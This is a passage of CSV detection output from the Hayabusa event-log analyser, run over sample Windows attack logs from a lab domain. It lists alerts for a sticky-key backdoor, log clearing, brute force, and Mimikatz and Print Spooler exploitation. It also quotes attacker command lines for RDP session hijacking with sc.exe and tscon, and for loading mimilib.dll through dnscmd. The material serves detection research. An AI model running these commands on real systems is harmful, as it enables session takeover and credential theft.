0x28da8a22,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x28da8a5a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x258b9ee5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor 
Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx 2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 
0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:39:35.406 +09:00,fs01.offsec.lan,4697,info,Persis,Service Installed,Name: hijackservice | Path: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x13b593d,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx 2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: 
C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx 2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll 
""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non 
existing users.evtx 2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: 